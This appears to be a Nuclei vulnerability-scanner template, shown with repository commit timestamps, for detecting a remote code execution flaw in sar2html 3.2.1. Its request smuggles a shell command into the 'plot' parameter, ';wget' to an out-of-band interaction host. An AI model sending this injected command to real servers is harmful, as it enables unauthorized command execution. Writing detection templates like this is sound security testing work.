nuclei-templates/vulnerabilities/other/sar2html-rce.yaml

25 lines
776 B
YAML
Raw Normal View History

id: sar2html-rce
info:
2021-08-12 09:33:49 +00:00
name: sar2html 3.2.1 - 'plot' Remote Code Execution
author: gy741
severity: critical
description: SAR2HTML could allow a remote attacker to execute arbitrary commands on the system, caused by a command injection flaw in the index.php script. By sending specially-crafted commands, an attacker could
exploit this vulnerability to execute arbitrary commands on the system.
reference:
- https://www.exploit-db.com/exploits/49344
2021-10-18 20:40:26 +00:00
tags: sar2html,rce,oast
requests:
- raw:
- |
2021-08-12 09:33:49 +00:00
GET /index.php?plot=;wget%20http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
Accept: */*
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"